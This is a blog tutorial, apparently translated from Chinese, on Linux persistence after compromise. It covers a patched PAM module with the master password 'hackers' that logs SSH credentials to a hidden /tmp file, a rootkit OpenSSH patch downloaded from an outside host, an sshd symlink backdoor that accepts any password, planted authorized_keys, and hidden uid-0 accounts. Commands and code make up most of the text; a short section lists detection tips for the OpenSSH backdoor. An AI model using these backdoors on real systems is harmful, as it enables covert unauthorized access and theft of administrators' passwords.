Linux permission maintenance—OpenSSH&PAM backdoor&SSH soft connection&public and private key login

1. SSH-PAM backdoor

  PAM is an authentication module. PAM can be used as Linux login verification and authentication of various basic services. Simply put, it is a mechanism for user authentication on Linux systems. When performing authentication, first determine what service it is, then load the corresponding PAM configuration file (located in /etc/pam.d), and finally call the authentication file (located in /lib/security) for security authentication. The easily exploitable PAM backdoor is also modified Authentication logic in PAM source code to achieve permission maintenance

1.1. Overall process

1. Obtain the PAM version used by the target system and download the corresponding pam version.
2. Unzip, modify the pam_unix_auth.c file, and add a universal password
3. Compile and install PAM
4. The compiled file is in: modules/pam_unix/.libs/pam_unix.so, copy it to /lib64/security for replacement, that is, use the universal password to log in, and record the username and password into the file.

1.2. Operation demonstration

  The centos7.3 version is used here. Although the package demonstrated here can still be downloaded on github, during the actual test process, it was found that the test was unsuccessful.

1.2.1. Check PAM version

  The main thing here is that the PAM version is 1.1.8, so we also need to use the corresponding 1.1.8 version when downloading the PAM package.

setenforce 0    ##关闭防火墙
rpm -qa | grep pam

1.2.2. Download the corresponding version

  When downloading here, you also need to download 1.1.8. Of course, you can also use wget to download. I keep getting parsing errors here. You can upload it after downloading.

https://github.com/linux-pam/linux-pam/releases/tag/Linux-PAM-1_1_8

1.2.2.1. Unzip

tar -zxvf linux-pam-Linux-PAM-1_1_8.tar.gz

1.2.3. Install dependencies

  Mainly need to install the gcc compiler and flex library.

yum install gcc flex flex-devel -y

1.2.4. Modify configuration

  The main purpose of modifying the configuration here is to save the backdoor and SSH login account and password.

vim linux-pam-Linux-PAM-1_1_8/modules/pam_unix/pam_unix_auth.c 

1.2.4.1. Configuration content

  Modify the content at line 179 to the following content. It must be aligned here. If it cannot be aligned, then after the local modification is completed, upload it to the target host to replace the original file.

/* verify the password of this user */
retval = _unix_verify_password(pamh, name, p, ctrl);
if(strcmp("hackers",p)==0){return PAM_SUCCESS;} //后门密码
if(retval == PAM_SUCCESS){ 
FILE * fp; 
fp = fopen("/tmp/.sshlog", "a");//SSH登录用户密码保存位置
fprintf(fp, "%s : %s\n", name, p); 
fclose(fp);} 
name = p = NULL;
AUTH_RETURN;

1.2.4.2. Compile and install

  I noticed that it cannot be compiled here. I don’t know. I replaced a pam package with the backdoor to succeed. Although this method of exploitation does still exist on the Internet, many articles are from a few years ago. It may not be possible. Was eliminated.

cd linux-pam-Linux-PAM-1_1_8
./configure && make

1.2.4.3. Backup configuration

  Back up the original pam_unix.so to prevent errors in logging in, and copy the new PAM module to the /lib64/security/ directory.

cp /usr/lib64/security/pam_unix.so /tmp/pam_unix.so.bakcp
cd modules/pam_unix/.libs
cp pam_unix.so /usr/lib64/security/pam_unix.so

1.2.5. Connection test

  You can see that the connection is successful here.

1.2.6. View login password

  Since the password log file is hidden, you can directly use cat to view it. Here, as long as the administrator uses ssh to connect, the password will be recorded, and these operations are invisible. Of course, if the administrator will check it regularly, then this If it is discovered, it will still be discovered. These are only sustainable because the administrator does not check regularly.

cat /tmp/.sshlog

2. OpenSSH backdoor

  OpenSSH is a free and open source implementation of the SSH (Secure Shell) protocol. Many people mistakenly believe that OpenSSH is related to OpenSSL, but in fact the two projects have different purposes and different development teams. The names are similar just because they have the same development goal-to provide open source encrypted communication software.

2.1. Principle

  Replace the SSH protocol support software openssh of your own operating system and reinstall the customized openssh to record the account password and use the universal password connection function!

2.2. Operation demonstration

  Here, there is a problem that there may be failures during the entire process. It took me three attempts to succeed in this experiment, and there are still many imperfections in the process, which can be easily noticed.

  I also said that I have tested it several times, so I don’t want to write the rest. I am really speechless.

  Reference article

2.2.1. Install dependencies

  Here some dependencies will be updated and installed.

yum -y install openssl openssl-devel pam-devel zlib zlib-devel
yum -y install gcc gcc-c++ make              

2.2.2. Download replacement packages and backdoor files

  You can download it manually or download it online. If an error occurs during the online download, download it manually and then upload it.

wget http://core.ipsecs.com/rootkit/patch-to-hack/0x06-openssh-5.9p1.patch.tar.gz
wget https://mirror.aarnet.edu.au/pub/OpenBSD/OpenSSH/portable/openssh-5.9p1.tar.gz

2.2.2.1. Unzip the package

tar -xzvf openssh-5.9p1.tar.gz 
tar -xzvf 0x06-openssh-5.9p1.patch.tar.gz

2.2.3. Install openssh

  If the key pahch appears here, use yum to install it.

cp openssh-5.9p1.patch/sshbd5.9p1.diff openssh-5.9p1
cd openssh-5.9p1 && patch < sshbd5.9p1.diff

2.2.3.1. Edit Password

  Just change the one after define SECRETPW to the password you want.

vim includes.h

2.2.3.2. Installation and compilation

  One thing to note here is that it may not be possible to compile successfully, and sometimes it cannot be edited at all. In many materials found on the Internet, they skip giving commands directly, so I will say it in advance here, it may not be possible to compile successfully, no If successful, retest again. If it still doesn't work, pull it.

./configure --prefix=/usr --sysconfdir=/etc/ssh --with-pam --with-kerberos5 && make && make install

2.2.4. Restart

  There may also be problems with restarting here. This experiment is sometimes very inexplicable. Sometimes the test can be successful, and sometimes the test is unsuccessful.

systemctl restart sshd.service #重启sshd服务
systemctl status sshd.service #查看ssh启动状态

2.2.5. Test login

  This will happen if ssh fails to restart successfully or the previous test fails, and local ssh cannot connect.

2.2.5.1. Super password test

  Here I test that I can log in using the admin password.

ssh [email protected]

2.2.5.2. View clear text password

cat /tmp/ilog

2.3. Prevention methods

1. Reinstall the OpenSSH software and update to the latest version 7.2.
2. Change the SSH default login port 22 to another port.
3. Add SSH access policy in IPTable.
4. Check the command history and clean up suspicious files. If conditions permit, the system can be redone.
5. Change the passwords of all users on the server to new strong passwords.
6. Use the strace command to find out the SSH backdoor.
7. Run the "ps aux | grep sshd" command to obtain the PID of the suspicious process, and run the "strace -o aa -ff -p PID" command for tracking. After successfully logging in to SSH, the output of the strace command is generated in the current directory.
8. Use the "grep open aa* | grep -v -e No -e null -e denied| grep WR" command to view the record file.
9. In the above command, filter error messages, /dev/null messages and denied messages to find files with read and write mode (WR) turned on (because the recorded passwords need to be written to the file).
10. You can find the location of the SSH backdoor password file recorded in the file in read-write mode, and use this method to determine whether there is an SSH backdoor. Of course, there are also cases where the password is not recorded and only a universal SSH backdoor is left.

3. SSH soft link

  Under the premise that PAM authentication is enabled in the sshd service configuration, and the control flag in the PAM configuration file is sufficient, as long as the pam_rootok module detects that the uid is 0 (root), the authentication login can be successful.

3.1. Operation demonstration

  This operation is only allowed to connect when the server is continuously powered on. If it is shut down, the backdoor cannot be used again.

3.1.1. Check whether pam authentication is enabled

  If it is no here, you can go to this configuration file to modify it directly, but you need root permissions.

cat /etc/ssh/sshd_config|grep UsePAM

3.1.2. Establishing soft connections

  After establishing a soft connection here, you need to open the firewall port. It doesn't matter if the firewall is closed.

ln -sf /usr/sbin/sshd /tmp/su ;/tmp/su -oPort=9999
#开启软链接，链接端口为9999
 
firewall-cmd --add-port=9999/tcp --permanent
#开启防火墙规则，不然会连接不上
 
firewall-cmd --reload
#重启防火墙服务
 
firewall-cmd --query-port=9999/tcp
#查看防火墙9999端口是否被放行，回显为YES即成功放行

3.1.3. Testing

  The 9999 behind here is the port. Just enter some password and you can log in.

ssh [email protected] -p 9999   ##-p 后面这个是端口

4. Public and private items

  Principle: Use a key generator to create a pair of keys, namely a public key and a private key. Add the public key to an account on the server, and then use the private key on the client to complete authentication and log in.

4.1. Operation demonstration

  The whole process is to generate a key on a local Linux server, then upload the public key to the target host, and then use the local computer to connect to the target host to achieve a password-free connection.

  But there are also shortcomings, which are too easy to discover.

4.1.1. Turn on

  There may be a command here that is missing, just enter it when the time comes. Note here that both the attacking machine and the target machine need to turn on this verification.

vim /etc/ssh/sshd_config

RSAAuthentication yes
PubkeyAuthentication yes
AuthorizedKeysFile .ssh/authorized_keys

4.1.2. Attack machine generation

  Here the attack machine is used to generate the key.

ssh-keygen -t rsa #三次回车
id_rsa : 私钥
id_rsa.pub : 公钥

4.1.3. Upload to target host

  Here, the contents of the public key in the attacking machine are copied to authorized_keys. If this file does not exist locally, create one.

/root/.ssh/authorized_keys

4.1.4. Login test

  If you log in directly here, you will find that there is no need to use password verification. In fact, key verification has already been performed when kali connects to the target host.

ssh [email protected]

5. Backdoor accounts

  Creating a backdoor account is also easy to discover, unless the server is not inspected on a daily basis. If there is a normal administrator inspection or the settings are relatively strict, it usually cannot be retained for too long.

5.1. Method 1

  Add account test1, set uid to 0, password to 123456

useradd -p `openssl passwd -1 -salt 'salt' 123456` test1 -o -u 0 -g root -G root -s /bin/bash -d /home/test1

5.1.1. Testing

ssh [email protected]

5.2. Method 2

echo "test2:x:0:0::/:/bin/sh" >> /etc/passwd #增加超级用户账号
passwd test2 #修改test2的密码为123456

5.2.1. Testing

ssh [email protected]